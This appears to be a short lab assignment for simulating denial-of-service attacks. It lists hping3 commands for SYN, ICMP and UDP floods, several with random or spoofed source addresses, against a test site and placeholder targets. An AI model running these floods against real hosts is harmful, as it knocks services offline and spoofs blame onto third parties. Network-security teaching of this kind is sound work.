

Aim:  To simulate DOS attack by using HPING and other tools.Assignment
1 sudo apt-get install hping3 -y
2 hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com
3 hping3 -S --flood -V wwww.hping3testsite.com
4 hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com
5 hping3 -1 --flood -a y.y.y.y x.x.x.x
6 hping3 -S -a y.y.y.y --flood -p 80 x.x.x.x
7 hping3 --flood -a y.y.y.y -2 -p 6234 x.x.x.x
8 sudo hping3 myip
9 in other terminal ping yourself
10 sudo hping3 myipd --flood -p 80	
